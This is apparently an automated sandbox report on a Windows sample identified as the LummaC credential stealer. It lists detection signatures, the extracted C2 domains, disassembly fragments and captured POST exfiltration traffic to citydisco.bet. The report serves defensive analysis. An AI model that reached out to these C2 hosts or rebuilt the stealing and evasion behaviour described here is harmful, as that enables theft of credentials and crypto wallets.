Edit tour

Windows Analysis Report
SoftWare.exe1.exe

Overview

General Information

Sample name:	SoftWare.exe1.exe
Analysis ID:	1637282
MD5:	87a47a76f6fa81e316f77d1fbe07eef1
SHA1:	e3455675f40783b67207aa37f5380493e54c4f18
SHA256:	bf1afeb9f9662c5811556d7e3157d9225657e10573d44fee67c332acfbfc326c
Tags:	exeuser-TornadoAV_dev
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to modify clipboard data

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

SoftWare.exe1.exe (PID: 5224 cmdline: "C:\Users\user\Desktop\SoftWare.exe1.exe" MD5: 87A47A76F6FA81E316F77D1FBE07EEF1)

SoftWare.exe1.exe (PID: 4600 cmdline: "C:\Users\user\Desktop\SoftWare.exe1.exe" MD5: 87A47A76F6FA81E316F77D1FBE07EEF1)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["citydisco.bet/gdJIS", "crosshairc.life/dAnjhw", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"], "Build id": "80712606b6232d4708ff7e4bff6772778b082897fe63729d1329"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000002.00000003.1010720289.00000000012DA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.985320183.00000000012EC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.985030791.00000000012D3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.2134397080.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000002.878081831.0000000001273000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000002.00000003.1010456185.00000000012D3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.1010752102.00000000012EC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.985152699.00000000012D3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SoftWare.exe1.exe PID: 4600	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SoftWare.exe1.exe PID: 4600	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Click to see the 5 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.SoftWare.exe1.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
2.2.SoftWare.exe1.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T13:40:02.518004+0100	2028371	3	Unknown Traffic	192.168.2.8	49682	188.114.96.3	443	TCP
2025-03-13T13:40:05.224227+0100	2028371	3	Unknown Traffic	192.168.2.8	49683	188.114.96.3	443	TCP
2025-03-13T13:40:07.777182+0100	2028371	3	Unknown Traffic	192.168.2.8	49684	188.114.96.3	443	TCP
2025-03-13T13:40:10.474420+0100	2028371	3	Unknown Traffic	192.168.2.8	49685	188.114.96.3	443	TCP
2025-03-13T13:40:13.230735+0100	2028371	3	Unknown Traffic	192.168.2.8	49686	188.114.96.3	443	TCP
2025-03-13T13:40:16.065897+0100	2028371	3	Unknown Traffic	192.168.2.8	49687	188.114.96.3	443	TCP
2025-03-13T13:40:20.907435+0100	2028371	3	Unknown Traffic	192.168.2.8	49693	188.114.96.3	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: crosshairc.life/dAnjhw

Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.878081831.0000000001273000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["citydisco.bet/gdJIS", "crosshairc.life/dAnjhw", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"], "Build id": "80712606b6232d4708ff7e4bff6772778b082897fe63729d1329"}

Multi AV Scanner detection for submitted file

Source: SoftWare.exe1.exe	Virustotal: Detection: 42%			Perma Link
Source: SoftWare.exe1.exe	ReversingLabs: Detection: 39%

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.878081831.0000000001273000.00000004.00000020.00020000.00000000.sdmp	String decryptor: citydisco.bet/gdJIS
Source: 00000000.00000002.878081831.0000000001273000.00000004.00000020.00020000.00000000.sdmp	String decryptor: crosshairc.life/dAnjhw
Source: 00000000.00000002.878081831.0000000001273000.00000004.00000020.00020000.00000000.sdmp	String decryptor: mrodularmall.top/aNzS
Source: 00000000.00000002.878081831.0000000001273000.00000004.00000020.00020000.00000000.sdmp	String decryptor: jowinjoinery.icu/bdWUa
Source: 00000000.00000002.878081831.0000000001273000.00000004.00000020.00020000.00000000.sdmp	String decryptor: legenassedk.top/bdpWO
Source: 00000000.00000002.878081831.0000000001273000.00000004.00000020.00020000.00000000.sdmp	String decryptor: htardwarehu.icu/Sbdsa
Source: 00000000.00000002.878081831.0000000001273000.00000004.00000020.00020000.00000000.sdmp	String decryptor: cjlaspcorne.icu/DbIps
Source: 00000000.00000002.878081831.0000000001273000.00000004.00000020.00020000.00000000.sdmp	String decryptor: bugildbett.top/bAuz

Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0041D1C2 CryptUnprotectData,		2_2_0041D1C2
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_0041EECC CryptUnprotectData,CryptUnprotectData,		2_2_0041EECC

Source: SoftWare.exe1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49682 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49683 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49684 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49685 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49686 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49687 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49693 version: TLS 1.2

Source: SoftWare.exe1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_00818ECE FindFirstFileExW,	0_2_00818ECE
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 0_2_00818F7F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00818F7F
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00818ECE FindFirstFileExW,	2_2_00818ECE
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 2_2_00818F7F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	2_2_00818F7F

Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edx+10E8C126h]	2_2_00411040
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then mov ecx, edi	2_2_0042C080
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then mov byte ptr [ecx], bl	2_2_00411640
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then cmp word ptr [edi+ebx], 0000h	2_2_0044D990
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], CA198B66h	2_2_0042FA30
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-7FFFFFFFh]	2_2_0042FA30
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then movzx eax, di	2_2_0042FA30
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+4E5AD110h]	2_2_0040DAC0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then mov byte ptr [ebx], al	2_2_00436C8E
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then mov byte ptr [esi], cl	2_2_00436D60
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then push eax	2_2_0040ED7F
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-7FC4FC76h]	2_2_00421EF0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 64DAE379h	2_2_00421EF0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-7FC4FC82h]	2_2_00421EF0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 6D58C181h	2_2_00421EF0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then mov dword ptr [esp], ecx	2_2_004380AC
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then mov byte ptr [esi], cl	2_2_004371CF
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	2_2_0040A340
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	2_2_0040A340
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 7A542AABh	2_2_0044E340
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax-2Eh]	2_2_0043137E
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax-2Eh]	2_2_0043137E
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+04h]	2_2_0043238F
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	2_2_00442440
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then mov dword ptr [esp], ecx	2_2_0043644C
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax-7FC4FC7Ah]	2_2_0041D4F0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h	2_2_00429490
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	2_2_00429490
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-1530D448h]	2_2_00421510
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+08h]	2_2_00421510
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [edx+eax+013A68D0h]	2_2_00433587
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then mov dword ptr [esp], ecx	2_2_0043658C
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then mov byte ptr [ebx], cl	2_2_00436598
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then cmp dword ptr [edi+ecx*8], 744E5843h	2_2_00449650
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+0Ch]	2_2_00413670
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [edx+eax+013A68D0h]	2_2_0043360A
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	2_2_0043163A
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax-7FC4FC7Ah]	2_2_0041D6D2
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then mov byte ptr [ebx], cl	2_2_0040C6F0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 3FDB1228h	2_2_00412723
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-7FCB06BCh]	2_2_004327D4
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax-7FC4FC7Ah]	2_2_0041D782
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_0041D842
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-7FC4FC82h]	2_2_00446850
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then mov eax, dword ptr [esp+58h]	2_2_0040E82F
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+edi+6A51526Ah]	2_2_004278F0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then mov byte ptr [edi], cl	2_2_004369B3
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+08BE7850h]	2_2_0044AA44
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then mov edx, ecx	2_2_00433A4B
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx]	2_2_0044EA50
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-3ECF6056h]	2_2_00425A00
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then mov byte ptr [edi], cl	2_2_00425A00
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then mov word ptr [edi], cx	2_2_00429A30
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then mov ebp, eax	2_2_00408AC0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then mov word ptr [ebx], cx	2_2_0042EA80
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h	2_2_0041EB48
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then mov dword ptr [esi+0Ch], ecx	2_2_00420B1E
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	2_2_0041BBD0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+0Ch]	2_2_00449BA0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax-7FC4FC7Ah]	2_2_0041DBBC
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then jmp ecx	2_2_00423C80
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then jmp ecx	2_2_00423C95
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then cmp dword ptr [esp], 00000000h	2_2_00446D51
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h	2_2_0041ED5D
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [ebp+eax+00h]	2_2_0040CE40
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax-7FC4FC7Ah]	2_2_0041DE36
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then mov byte ptr [esi], cl	2_2_00436E39
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+ecx-14h]	2_2_00445EC0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	2_2_00433EE0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax-7FC4FC7Ah]	2_2_0041DEF1
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax-7FC4FC7Ah]	2_2_0041DEF1
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax-7FC4FC7Ah]	2_2_0041DEF1
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax-7FC4FC7Ah]	2_2_0041DEF1
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then add edi, ecx	2_2_0042EE93
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then cmp word ptr [ebx+esi+02h], 0000h	2_2_00428EA0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then mov edx, dword ptr [esp+44h]	2_2_00424F20
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then mov edx, dword ptr [esp+44h]	2_2_00424F29
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 743EDB10h	2_2_0044DFD0
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax-7FC4FC7Ah]	2_2_0041DFE9
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then mov dword ptr [esp], ecx	2_2_00437FFD
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax]	2_2_00446F87
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then movzx ecx, word ptr [ebp+eax+00h]	2_2_00446F87
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+12h]	2_2_00446F87
Source: C:\Users\user\Desktop\SoftWare.exe1.exe	Code function: 4x nop then mov byte ptr [esi], al	2_2_00437F89

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: citydisco.bet/gdJIS
Source: Malware configuration extractor	URLs: crosshairc.life/dAnjhw
Source: Malware configuration extractor	URLs: mrodularmall.top/aNzS
Source: Malware configuration extractor	URLs: jowinjoinery.icu/bdWUa
Source: Malware configuration extractor	URLs: legenassedk.top/bdpWO
Source: Malware configuration extractor	URLs: htardwarehu.icu/Sbdsa
Source: Malware configuration extractor	URLs: cjlaspcorne.icu/DbIps
Source: Malware configuration extractor	URLs: bugildbett.top/bAuz

Source: global traffic

TCP traffic: 192.168.2.8:53549 -> 162.159.36.2:53

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49686 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49683 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49684 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49687 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49693 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49685 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49682 -> 188.114.96.3:443

Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 61Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Grq7aN5lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 14481Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=76Xg9XZJFKaBwyP6JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15072Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0E3xaFCwmps6oZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20226Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=R4KZr3ty1rwhs0EjUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2595Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=u8A8tLI73LrUVKOyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 570380Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 99Host: citydisco.bet

Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: citydisco.bet

Source: unknown

HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 61Host: citydisco.bet

Source: SoftWare.exe1.exe, 00000002.00000003.956168068.0000000003A9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: SoftWare.exe1.exe, 00000002.00000003.956168068.0000000003A9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: SoftWare.exe1.exe, 00000002.00000003.956168068.0000000003A9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: SoftWare.exe1.exe, 00000002.00000003.956168068.0000000003A9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: SoftWare.exe1.exe, 00000002.00000003.956168068.0000000003A9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: SoftWare.exe1.exe, 00000002.00000003.956168068.0000000003A9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: SoftWare.exe1.exe, 00000002.00000003.956168068.0000000003A9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: SoftWare.exe1.exe, 00000002.00000003.956168068.0000000003A9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: SoftWare.exe1.exe, 00000002.00000003.956168068.0000000003A9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: SoftWare.exe1.exe, 00000002.00000003.956168068.0000000003A9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: SoftWare.exe1.exe, 00000002.00000003.956168068.0000000003A9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: SoftWare.exe1.exe, 00000002.00000003.905764398.0000000003AA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: SoftWare.exe1.exe, 00000002.00000003.957503742.0000000001353000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
Source: SoftWare.exe1.exe, 00000002.00000003.957503742.0000000001353000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
Source: SoftWare.exe1.exe, 00000002.00000003.905764398.0000000003AA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: SoftWare.exe1.exe, 00000002.00000003.905764398.0000000003AA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: SoftWare.exe1.exe, 00000002.00000003.905764398.0000000003AA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
